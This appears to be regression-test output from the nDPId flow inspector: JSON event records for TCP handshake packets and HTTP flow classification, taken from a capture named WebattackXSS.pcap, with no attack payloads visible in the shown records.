+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":2,"flow_last_seen":1499347958588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhrCsuJaMk8YnrKAScSCkXAAAAgQFtAQCCAoD5oEQATyvnAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":3,"flow_last_seen":1499347958589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347958589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iDhAAD4GPaCsEAABwKgKMoawAFCTxiesrLiWjYAQAOVDZAAAAQEICgE8r5wD5oEQ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347961167,"flow_last_seen":1499347961167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347961167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1499347961167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lndAAD4GL1msEAABwKgKMobKAFDSZyRWAAAAAKACchAtzgAAAgQFtAQCCAoBPLIhAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":2,"flow_last_seen":1499347961167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhsp1SlCg0mckV6AScSDhRgAAAgQFtAQCCAoD5oOVATyyIQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":3,"flow_last_seen":1499347961168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347961168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lnhAAD4GL2CsEAABwKgKMobKAFDSZyRXdUpQoYAQAOWATgAAAQEICgE8siED5oOV"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347962480,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347962480,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OwpAAD4GisasEAABwKgKMobYAFAZTIhjAAAAAKACchCBhgAAAgQFtAQCCAoBPLNpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":2,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhtjOuip1GUyIZKAScSAAcgAAAgQFtAQCCAoD5oTdATyzaQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":3,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OwtAAD4Gis2sEAABwKgKMobYAFAZTIhkzroqdoAQAOWfeQAAAQEICgE8s2kD5oTd"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347963774,"flow_last_seen":1499347963774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347963774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1499347963774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82g5AAD4G68GsEAABwKgKMobmAFBdLG6iAAAAAKACchBWFgAAAgQFtAQCCAoBPLSsAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8263,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":2,"flow_last_seen":1499347963774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhub+xS4sXSxuo6AScSCf\/AAAAgQFtAQCCAoD5oYgATy0rAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":3,"flow_last_seen":1499347963775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347963775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02g9AAD4G68isEAABwKgKMobmAFBdLG6j\/sUuLYAQAOU\/AwAAAQEICgE8tK0D5oYg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347965133,"flow_last_seen":1499347965133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347965133,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1499347965133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KcdAAD4GnAmsEAABwKgKMob0AFDtE5\/HAAAAAKACchCTpwAAAgQFtAQCCAoBPLYAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":2,"flow_last_seen":1499347965133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhvTIVjMH7ROfyKAScSANzgAAAgQFtAQCCAoD5od0ATy2AAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":3,"flow_last_seen":1499347965134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347965134,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KchAAD4GnBCsEAABwKgKMob0AFDtE5\/IyFYzCIAQAOWs1QAAAQEICgE8tgAD5od0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347966420,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347966420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U6hAAD4GciisEAABwKgKMocCAFDUQeTqAAAAAKACchBmBgAAAgQFtAQCCAoBPLdCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":2,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhwJV63ns1EHk66AScSAKcQAAAgQFtAQCCAoD5oi2ATy3QgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8285,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":3,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U6lAAD4Gci+sEAABwKgKMocCAFDUQeTrVet57YAQAOWpeAAAAQEICgE8t0ID5oi2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347967724,"flow_last_seen":1499347967724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1499347967724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JnBAAD4Gn2CsEAABwKgKMocQAFDWSp74AAAAAKACchComwAAAgQFtAQCCAoBPLiIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":2,"flow_last_seen":1499347967725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhxDJR2HM1kqe+aAScSDwgwAAAgQFtAQCCAoD5on8ATy4iAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":3,"flow_last_seen":1499347967725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347967725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JnFAAD4Gn2esEAABwKgKMocQAFDWSp75yUdhzYAQAOWPiwAAAQEICgE8uIgD5on8"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347970267,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347970267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vvZAAD4GBtqsEAABwKgKMocqAFAxLQXyAAAAAKACchDkKQAAAgQFtAQCCAoBPLsEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":2,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhyoPJF9xMS0F86AScSDmFAAAAgQFtAQCCAoD5ox4ATy7BAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":3,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vvdAAD4GBuGsEAABwKgKMocqAFAxLQXzDyRfcoAQAOWFHAAAAQEICgE8uwQD5ox4"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347971560,"flow_last_seen":1499347971560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347971560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1499347971560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XBJAAD4Gab6sEAABwKgKMoc4AFCpCuBVAAAAAKACchCQlwAAAgQFtAQCCAoBPLxHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":2,"flow_last_seen":1499347971560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhzgyg4heqQrgVqAScSBE8wAAAgQFtAQCCAoD5o27ATy8RwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":3,"flow_last_seen":1499347971561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347971561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XBNAAD4GacWsEAABwKgKMoc4AFCpCuBWMoOIX4AQAOXj+gAAAQEICgE8vEcD5o27"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347974113,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347974113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 